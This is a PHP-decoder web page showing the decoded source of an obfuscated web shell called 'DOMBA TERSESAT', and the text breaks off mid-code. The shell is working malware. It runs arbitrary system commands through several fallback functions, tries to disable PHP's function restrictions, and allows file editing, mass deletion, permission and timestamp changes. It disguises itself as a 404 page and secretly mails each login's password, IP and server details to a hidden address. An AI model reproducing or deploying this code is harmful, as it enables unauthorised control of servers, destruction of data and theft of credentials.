Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto fAhFZ; O1RqN: goto u21ap; goto ifDbP; wYXrr: set_time_limit(0); goto Odv..

Decoded Output download

 
 
<?php  
 goto fAhFZ; O1RqN: goto u21ap; goto ifDbP; wYXrr: set_time_limit(0); goto OdvXK; O8WKF: Sif0P: goto Vmn_x; Dc2M6: goto lhjuO; goto XA8dg; oUC3I: mmZiN: goto hogqD; K15JR: s7SaO: goto anA6j; r06O5: if ($_7["action"] == "delete_file") { s(); if ($_7["yeahx"]) { $delete = $GLOBALS["fungsi"][4]($file); if ($delete) { echo "<strong>Delete file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Delete file</strong> fail! " . er() . "</div>"; } } echo " 
	\x9<div class='btn-group mb-3'>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>\xa		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a> 
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a> 
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a> 
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
\x9	</div>\xa\x9\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9		<p>Are you sure to delete : " . basename($file) . " ?</p>\xa	\x9	<form method='POST'>\xa			\x9<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a>\xa	\x9\x9	<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> 
\x9	\x9</form>\xa\x9	</div>"; } goto zF6Wn; ORaqL: if (isset($_GET["logout"])) { session_unset(); session_destroy(); header("Location: " . $_SERVER["PHP_SELF"]); die; } goto t7axT; US9Ue: T2So2: goto ttsjz; toPda: Cw7TO: goto Fo5Z3; p0Xma: goto bsBAb; goto dJHtg; mtdCy: goto lRnUM; goto J7ByC; H2Pi7: SoWRM: goto XTWbw; y7AR6: $Array = array("66696c655f6765745f636f6e74656e7473", "69735f646972", "66696c655f7075745f636f6e74656e7473", "69735f66696c65", "756e6c696e6b", "66756e6374696f6e5f657869737473", "6261736536345f656e636f6465", "676574637764"); goto rHqsK; YnPrN: if (isset($_GET["id"]) && $_GET["id"] === "lockshell") { $newPermissions = 292; changeFilePermissions($filename, $newPermissions); } goto IPiVI; BBEnD: goto ZW3j1; goto ZuNbg; iI08Z: KhULb: goto Ql4_q; BGEv7: goto idbRV; goto An3ph; YDZ81: if (isset($_GET["id"]) && $_GET["id"] === "dark_folders") { $newFolderPermissions = 365; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } goto GRqen; t2E2c: e0LVC: goto vCRhl; bVyWm: QtYOL: goto gGqFs; newX3: NpAkq: goto b0NkH; xcEQS: function exe($cmd) { if ($GLOBALS["fungsi"][5]("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif ($GLOBALS["fungsi"][5]("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif ($GLOBALS["fungsi"][5]("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("proc_open")) { $pipes = array(); $process = @proc_open($cmd . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $buff = @stream_get_contents($pipes[1]); @proc_close($process); return $buff; } elseif ($GLOBALS["fungsi"][5]("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto t8rbj; xhFtK: goto fGDY0; goto B8N23; WSsCt: VDEd5: goto boq4M; SleZJ: @ini_set("disable_functions", 0); goto Z5_Jj; bKjHY: if ($_7["action"] == "zip_folder") { s(); if ($_7["yeah"]) { $zipFile = $dir . ".zip"; $zip = new ZipArchive(); if ($zip->open($zipFile, ZipArchive::CREATE) === true) { $source = realpath($dir); $zip->addEmptyDir(basename($source)); $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source)); foreach ($iterator as $file) { if ($file->isDir()) { $zip->addEmptyDir($source . "/" . $iterator->getSubPathName()); } else { $zip->addFile($file, $iterator->getSubPathName()); } } $zip->close(); echo "<strong>Zip folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Zip folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } echo " 
	\x9\x9<div class='btn-group mb-3'> 
\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa	\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>\xa\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a> 
\x9		</div>\xa			<div class='card card-body text-dark input-group mb-3'> 
		\x9\x9<p>Are you sure to zip : " . basename($dir) . " ?</p> 
\x9			<form method='POST'>\xa\x9				<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a> 
\x9			\x9<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'> 
\x9\x9	\x9</form> 
\x9	\x9</div>"; } goto rW9GQ; rQ2oC: $currentDirectory = "."; goto nsGkt; XA8dg: rGIHh: goto vKDMF; LJyFE: if (isset($_7["edit_file"])) { $updt = fopen("{$file}", "w"); $result = fwrite($updt, $_7["contents"]); if ($result) { echo "<strong>Edit file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Edit file</strong> fail! " . er() . "</div>"; } } goto EhW21; NZN8n: HD1QB: goto u8kVm; HHFCL: goto I694s; goto ONGIi; m31q9: Ob__b: goto n8j2h; mXEzo: if ($location_data && $location_data["status"] === "success") { $country = $location_data["country"]; $countryCode = $location_data["countryCode"]; $region = $location_data["region"]; $regionName = $location_data["regionName"]; $city = $location_data["city"]; $zip = $location_data["zip"]; $lat = $location_data["lat"]; $lon = $location_data["lon"]; $timezone = $location_data["timezone"]; $isp = $location_data["isp"]; $org = $location_data["org"]; $as = $location_data["as"]; $address = "Country: {$country} ({$countryCode}), Region: {$regionName} ({$region}), City: {$city}, Zip: {$zip}, Latitude: {$lat}, Longitude: {$lon}, Timezone: {$timezone}, ISP: {$isp}, Organization: {$org}, AS: {$as}"; } else { $address = "Alamat tidak ditemukan"; } goto GrcPr; k_zrx: $response = curl_exec($ch); goto nO2y6; Q8GKs: y6Y_L: goto si1pW; rh9KY: goto Rc8_b; goto yWSnK; b0NkH: if (isset($_GET["id"]) && $_GET["id"] === "root_file") { $newFilePermissions = 420; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } goto kKDOw; VcPEY: EGOzL: goto rQ2oC; j0wib: echo " 
	<html>\xa\x9<head> 
	\x9<title>404 Not Found</title> 
	\x9<meta charset='UTF-8'> 
\x9\x9<meta name='author' content='DOMBA TERSESAT'>\xa		<meta name='robots' content='noindex, nofollow, noarchive'> 
		<meta name='viewport' content='width=device-width, initial-scale=0.70'> 
\x9\x9<link rel='icon' href='https://chat.openai.com/apple-touch-icon.png'>\xa\x9\x9<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css'> 
\x9	<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css'>\xa\x9	<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css'> 
\x9\x9<script src='https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>\xa\x9\x9<script src='https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>\xa	\x9<script src='https://code.jquery.com/jquery-3.3.1.slim.min.js'></script> 
\x9\x9<script> 
	\x9function toggleShellNameInput(isVisible) {\xa\x9	\x9var shellNameInput = document.getElementById('namafile'); 
			shellNameInput.required = isVisible;\xa\x9	\x9shellNameInput.style.display = isVisible ? 'block' : 'none';\xa		}\xa\x9\x9window.onload = function () { 
\x9	\x9toggleShellNameInput(false);\xa\x9\x9};\xa	</script>\xa        <style> 
	\x9	@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&display=swap');\xa		\x9*{ 
\x9\x9\x9\x9font-family: 'Poppins', sans-serif; 
\x9\x9		font-weight: 400; 
	\x9\x9}\xa            gr {\xa                color: green; 
            }\xa            rd {\xa                color: red; 
            } 
	\x9\x9corner { 
                position: relative; 
            }\xa            </style>\xa        <body class='bg-secondary text-light'>\xa\x9<div class='container-fluid'>\xa\x9<div class='py-3' id='main'>\xa\x9\x9<div class='box shadow bg-dark p-4 rounded-3'> 
			<a class='text-decoration-none text-light anu' href='" . $_SERVER["PHP_SELF"] . "'><h4>DOMBA TERSESAT</h4></a>"; goto jhqTu; sBdeq: $ip = gethostbyname($_SERVER["HTTP_HOST"]); goto pLTwC; M9GSH: wmm9T: goto JKY8I; J9JM9: goto MxRFR; goto crGb4; JKY8I: $ip_internal = getHostByName(getHostName()); goto nEeZx; osASh: goto ZT39K; goto dqJ0W; RicPt: If5hf: goto fP29U; e4Pf2: if (isset($_7["path"])) { $path = unhex($_7["path"]); chdir($path); } else { $path = $gcw(); } goto XqS3f; u1Gp4: if ($_7["id"] == "delete") { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $fileToDelete = "{$dir}/{$namefile}"; if (is_file($fileToDelete) && is_writable($fileToDelete)) { if (unlink($fileToDelete)) { echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$fileToDelete} deleted successfully<br>"; } else { echo "[<red><i class='bi bi-exclamation-triangle-fill'></i></red>]&nbsp;Failed to delete {$fileToDelete}<br>"; } } $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; if ($dirb === "." || $dirb === "..") { continue; } if (is_dir($dirc)) { mass_delete($dirc, $namefile); } } } } if ($_7["start"]) { mass_delete($_7["d_dir"], $_7["d_file"]); } s(); echo "\xa\x9		<div class='card card-body text-dark input-group mb-3'> 
\x9\x9	<u>Mass Delete</u> 
\x9\x9\x9	<form method='POST'>\xa\x9	\x9		<i class='bi bi-folder'></i> Directory: 
\x9			\x9<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}' {$_r}>\xa			\x9\x9<i class='bi bi-file-earmark'></i> Filename:\xa\x9\x9			<div class='input-group'> 
	\x9\x9\x9\x9\x9<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' {$_r}><br>\xa\x9\x9\x9\x9		<div class='input-group-append'> 
	\x9\x9\x9	\x9\x9<input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'> 
\x9\x9	\x9\x9\x9</div> 
\x9\x9\x9\x9	</div>\xa	\x9		</form> 
			</div>"; } goto q0gSw; vCRhl: curl_close($ch); goto CC7Pb; v_KJh: Rl8Ii: goto y7AR6; u8kVm: $ip_public = $_SERVER["REMOTE_ADDR"]; goto JfxNK; bvDAd: jEqlm: goto PoI1u; vUL9Z: @clearstatcache(); goto T223U; jfWwD: S88LA: goto FzmDW; t8rbj: goto IP7wT; goto i51iK; gFZrj: PPbbu: goto nI5xl; zsOiR: $soft = $_SERVER["SERVER_SOFTWARE"]; goto uba3F; F6gvW: @ini_set("display_errors", 0); goto tcING; o0h0r: goto JN_Oc; goto z1UDJ; apWbg: tIIkt: goto LJyFE; XMFJS: if ($_7["action"] == "touch_folder") { s(); $folderTimestamp = date("d-m-Y H:i:s", filemtime($dir)); if ($_7["yeahx"]) { $old = $dir; $new = $_POST["new_touch"]; if (strtotime($new) !== false) { if (touch($old, strtotime($new))) { echo "<strong>Touch folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Touch folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } else { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">\xa			\x9\x9\x9\x9<strong>Touch folder</strong> invalid timestamp format!  
		\x9			\x9<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> 
	\x9	\x9\x9\x9</div>"; } } echo "\xa	\x9\x9<div class='btn-group mb-3'>\xa			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa	\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa\x9		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a> 
	\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa			</div>"; echo " 
\x9		<div class='card card-body text-dark input-group mb-3'> 
\x9	\x9	<p>Are you sure to touch the folder: " . basename($dir) . " ?</p> 
\x9		\x9<form method='POST'> 
	\x9	\x9	<input type='text' name='new_touch' id='new_touch' class='form-control' value='{$folderTimestamp}' required> 
\x9\x9	\x9	<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a>\xa\x9\x9			<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> 
	\x9	\x9</form>\xa\x9		</div>"; } goto NMZxF; FEDzx: goto i2lyR; goto Y7KPr; oPun5: function changeFilePermissions($filename, $permissions) { if (file_exists($filename)) { if (chmod($filename, $permissions)) { echo "Izin file {$filename} berhasil diubah menjadi {$permissions}."; } else { echo "Gagal mengubah izin file {$filename}."; } } else { echo "File {$filename} tidak ditemukan."; } } goto wduFL; B8N23: q3W0Z: goto wjn3q; bkUmP: H3mcr: goto dyu0A; EfMKN: $kernel = php_uname(); goto EBffy; boRyc: $wget = exe("wget --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto UiiN6; iL_4F: goto q3W0Z; goto cKh9k; QwB_l: eo8KT: goto Pb4nF; OdvXK: goto fBRrX; goto RharQ; V13AP: Gm74y: goto KZprX; t7axT: goto xq51K; goto qepCq; zmKJM: H5D0K: goto q2iNw; PlOXp: goto XB8uL; goto qMxX4; FzmDW: $phpos = PHP_OS; goto ddA3e; rHqsK: goto OuGP1; goto UTVEK; KyHu0: AL88f: goto t03jb; kPsi7: @ini_set("error_log", null); goto fxMqf; T6cfq: goto KOMIS; goto lC6t8; H_nCu: ob_start(); goto ZLWhF; iXZQH: if (array_key_exists("loginin", $_POST)) { $password = $_POST["pass"]; $server_name = $_SERVER["SERVER_NAME"]; $php_self = $_SERVER["PHP_SELF"]; $report_bug = "IP: " . $_SERVER["REMOTE_ADDR"] . "  
City: {$city} 
Login: {$server_name}{$php_self} 
Pass: {$password} 
Kernel: {$kernel}"; @mail("[email protected]", "Hehehe", $report_bug); } goto EOe4J; eW7Zp: btnD5: goto vUL9Z; EvNBJ: $_7 = array_merge($_POST, $_GET); goto BEYcg; ld3Ay: h1v9W: goto BhbXk; Qdp7W: if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>{$disfunc}</rd>"; } goto mtdCy; GRqen: goto AL88f; goto Fmqk5; r3kFk: pKOtz: goto jD26d; nsGkt: goto NpAkq; goto O6bjS; K0Vz2: if ($_7["action"] == "touch_file") { s(); $fileTimestamp = date("d-m-Y H:i:s", filemtime($file)); if ($_7["yeahx"]) { $old = $file; $new = $_POST["new_touch"]; if (strtotime($new) !== false) { if (touch($old, strtotime($new))) { echo "<strong>Touch file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Touch file</strong> fail! " . er() . "</div>"; } } else { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert"> 
	\x9\x9			<strong>Touch file</strong> invalid timestamp format! \xa\x9	\x9			<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa	\x9\x9\x9\x9</div>"; } } echo " 
		<div class='btn-group mb-3'> 
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a> 
	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a> 
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
\x9	</div>"; echo " 
		<div class='card card-body text-dark input-group mb-3'> 
\x9\x9	<p>Are you sure to touch the file : " . basename($file) . " ?</p> 
\x9		<form method='POST'>\xa\x9\x9	\x9<input type='text' name='new_touch' id='new_touch' class='form-control' value='{$fileTimestamp}' required>\xa			\x9<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a> 
				<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'> 
	\x9\x9</form>\xa\x9\x9</div>"; } goto J9JM9; An3ph: MxRFR: goto REB1u; sI9CT: goto btnD5; goto gFZrj; SH3ma: goto TUS18; goto iaUZl; V8psl: Tbopv: goto FmZMv; no2rs: IVobD: goto a3uB9; ZNsnh: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } } goto fgATR; Uy2Ph: RWaoe: goto LSAD6; L4_mp: if (isset($_7["filenew"])) { s(); if (isset($_7["bikin"])) { $name = $_7["name_file"]; $contents_file = $_7["contents_file"]; foreach ($name as $name_file) { $handle = @fopen("{$name_file}", "w"); if ($contents_file) { $create = @fwrite($handle, $contents_file); } else { $create = $handle; } } if ($create) { echo "<script>window.location='?path=" . hex($path) . "'</script>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "\xa	\x9<div class='mb-3'>\xa	\x9\x9<form method='POST'> 
\x9	\x9	<i class='bi bi-file-earmark'></i> Filename:\xa\x9\x9	\x9<input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' {$_r}>\xa\x9\x9	\x9<i class='bi bi-file-earmark'></i> Your script: 
\x9\x9\x9\x9<textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' {$_r}></textarea>\xa		\x9	<div class='d-grid gap-2'>\xa\x9				<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'>\xa\x9\x9\x9	</div> 
\x9	\x9</form>\xa		</div>"; } goto ZX1e2; goYyD: XBCqU: goto F1IFe; W916h: goto W60P5; goto K15JR; iF5O8: session_start(); goto KFLyg; Pb4nF: $phpver = PHP_VERSION; goto BP1qv; gGqFs: error_reporting(0); goto sI9CT; WycuD: g_RKq: goto r06O5; GrcPr: goto gu3kV; goto mB2Mf; ZX1e2: goto mmZiN; goto o3T1g; QdZhC: $pesan_alert = "[VULN] Url : {$x_path}\xa\303\xa2\xe2\x80\x93\302\xac IP Address : [ " . $ip_public . " - Public ] / [ " . $ip_internal . " - Private ] 
\xc3\242\xe2\200\223\302\xac Address : [ " . $address . " ] 
\303\242\342\x80\223\302\xac User-Agent : [ " . $user_agent . " ]"; goto pX8l8; ak3P1: i2lyR: goto k_zrx; D2W59: function changeFilePermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); foreach ($iterator as $item) { if ($item->isFile()) { chmod($item->getPathname(), $perms); } } } goto nuhVX; pYVJI: gu3kV: goto NFI9A; Y7KPr: qmsSx: goto L4_mp; Ccdo0: lKeYb: goto H_nCu; dqQaX: OuGP1: goto qqZ23; Ihp18: set_time_limit(0); goto huEAZ; g0WyW: function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } goto KYCG3; kza90: goto KhULb; goto ST4JP; wQyvE: yn5Pk: goto IFtzp; TQyOY: goto g_RKq; goto VVNqs; fq2I4: $sql = $GLOBALS["fungsi"][5]("mysql_connect") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto IwR8N; qVaIQ: goto HLgyN; goto WycuD; MvvYi: goto Ob__b; goto cK2rs; syHtm: goto r40jO; goto tbtc1; qM7Rx: idbRV: goto SMgdl; JbRyv: r40jO: goto PPrH1; KYCG3: goto Tbopv; goto iYc1l; jikb3: goto M3BqJ; goto H2Pi7; BP1qv: goto S88LA; goto cGdUr; CPPBu: if ($_7["action"] == "chmod_folder") { s(); $FolderChmod = substr(sprintf("%o", fileperms($dir)), -4); function chmod_folder($dir, $permissions) { if (is_dir($dir)) { if (chmod($dir, octdec($permissions))) { return true; } else { return false; } } else { return false; } } if ($_7["yeah"]) { $permissions = $_7["permissions"]; if (chmod_folder($dir, $permissions)) { echo "<strong>Chmod folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Chmod folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } echo "\xa\x9		<div class='btn-group mb-3'>\xa				<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa	\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa	\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>\xa\x9\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa\x9		</div> 
	\x9	<div class='card card-body text-dark input-group mb-3'><p>Set permissions for : " . basename($dir) . "</p>\xa\x9		\x9<form method='POST'> 
\x9	\x9\x9	<input type='text' name='permissions' value='{$FolderChmod}' required>\xa		\x9		<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>Cancel</a>\xa	\x9\x9		<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Set Permissions'> 
				</form>\xa\x9		</div>"; } goto twjlG; I8bMz: goto QnGHN; goto JbRyv; vKDMF: $disfunc = @ini_get("disable_functions"); goto jGADS; n8j2h: $correctPassword = "domba"; goto U3NfY; tcING: goto L40lb; goto QbLd2; dyu0A: function ia() { $ia = ''; if (getenv("HTTP_CLIENT_IP")) { $ia = getenv("HTTP_CLIENT_IP"); } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ia = getenv("HTTP_X_FORWARDED_FOR"); } else { if (getenv("HTTP_X_FORWARDED")) { $ia = getenv("HTTP_X_FORWARDED"); } else { if (getenv("HTTP_FORWARDED_FOR")) { $ia = getenv("HTTP_FORWARDED_FOR"); } else { if (getenv("HTTP_FORWARDED")) { $ia = getenv("HTTP_FORWARDED"); } else { if (getenv("REMOTE_ADDR")) { $ia = getenv("REMOTE_ADDR"); } else { $ia = "Unknown IP."; } } } } } } return $ia; } goto jikb3; awheV: DB5uf: goto y9uy4; jhqTu: goto E53fJ; goto DFo23; VVNqs: xq51K: goto t_mQ0; VB_Zh: goto yn5Pk; goto k4dIj; ZLWhF: goto HgnMn; goto G0rig; UZCd7: K2OD0: goto oPun5; otufx: goto n0uKs; goto U6VA6; oSuaD: function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } goto a61L1; B2JgX: if ($_7["action"] == "edit") { s(); echo "\xa\x9\x9<div class='btn-group'> 
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a> 
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a> 
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a> 
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a> 
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a> 
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a> 
\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
	\x9</div>\xa\x9	<br> 
\x9		<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . "\xa	\x9</br>\xa	\x9<form method='POST'> 
\x9\x9\x9<textarea class='form-control btn-sm' rows='15' name='contents' {$_r}>" . htmlspecialchars($fungsi[0]($file)) . "</textarea> 
\x9	\x9<div class='d-grid gap-2'>\xa\x9\x9\x9<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button> 
			</div>\xa		</form>"; } goto syHtm; Pso6J: goto FkKSL; goto BUTIn; UwA0N: error_reporting(0); goto xQEXE; mB2Mf: fYypx: goto EoJs0; JaGks: goto lsV5N; goto g85JD; HlE6K: goto V3aam; goto yn2Tx; pJIHO: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<rd>ON</rd>" : "<gr>OFF</gr>"; goto Tyt1q; vVelv: function changeFolderPermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); foreach ($iterator as $item) { if ($item->isDir()) { chmod($item->getPathname(), $perms); } } } goto bPxnv; pLTwC: goto q1vD_; goto ygzyS; M_Q9a: Rc8_b: goto QdZhC; Njg7s: MSTMF: goto rnVAT; JfxNK: goto wmm9T; goto Niw5_; xk9iT: if ($_7["action"] == "rename_folder") { if ($_7["r_d"]) { $r_d = rename($dir, '' . dirname($dir) . "/" . htmlspecialchars($_7["r_d"]) . ''); if ($r_d) { echo "<strong>Rename folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Rename folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } s(); echo "\xa\x9	<div class='btn-group'> 
